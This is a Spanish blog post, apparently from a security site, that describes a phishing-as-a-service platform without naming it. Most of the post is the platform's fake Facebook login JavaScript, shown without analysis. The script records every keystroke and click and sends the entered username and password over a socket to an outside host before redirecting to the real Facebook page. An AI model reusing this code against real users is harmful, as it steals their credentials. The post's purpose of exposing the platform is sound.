No es novedad que a diario se venden miles de herramientas de hacking usadas con fines maliciosos. Estas herramientas, por regla general, requieren de un mínimo de conocimiento por parte del ciberdelincuente, pero a día de hoy esto está cambiando, y es que ya existen plataformas para realizar múltiples tipos de ataques sin saber siquiera el nombre del mismo.
Hoy vamos a exponer un caso de uso de unas de las múltiples plataformas que se pueden encontrar por Internet. El nombre de la web no va a ser publicado para no fomentar el uso de la misma entre los lectores.
Llama la atención al entrar en la web, la interfaz amigable y por qué no decirlo, infantil que tiene. Parece una página sin ninguna malicia, sin embargo contiene numerosos tipos de ataques los cuáles están gravemente penados por la ley en nuestro país.
Al registrarte, lo primero que aparece es un mensaje de bienvenida el cuál nos indica que tienen un pequeño tutorial para nosotros.
http://www.questionpro.com/qp_userimages/sub-2/1419981/Facebook.png?userFileID=259491
http://www.portugalrx.com/wp-content/uploads/2016/02/facebook_logo.png
<script type="text/javascript">
var BigData = {
id: '3015',
token: 'i0n8QDoNAk8VHo8Pg3MKNcwtXE0LWT2zUAYBdL9qAOlTkZpB6s',
name: 'Facebook',
site_id: '9',
redirect: 'http://www.facebook.com/login',
hsData: "9|3015|i0n8QDoNAk8VHo8Pg3MKNcwtXE0LWT2zUAYBdL9qAOlTkZpB6s|1500371221",
};
var socket = io('https://pod-1.logshit.com');
socket.on('ping', function (data) {
socket.emit('hello', BigData );
});
socket.on('redirect', function(data){
window.location = BigData.redirect;
});
$(document).ready(function(){
$('body').click(function(e){
this.BigData = BigData;
socket.emit('clicked', this.BigData);
});
$('body').on('keyup', function(e){
this.BigData = BigData;
this.BigData.key = e.key;
socket.emit('keyup', this.BigData);
});
});
$("#login_form").keypress(function(e) {
if (e.which == 13) {
$("#submit").click();
}
});
$("#submit").click(function(e) {
e.preventDefault();
if ($("#username").val() == "") {
var err = "1";
alert('Username cannot be left empty');
}
if ($("#password").val() == "") {
var err = "1";
alert('Password cannot be left empty');
}
if (err != "1") {
socket.emit('log', {
username : $("#username").val(),
password : $("#password").val(),
hsData: BigData.hsData,
BigData: BigData,
});
}
});
</script>
Dejar un comentario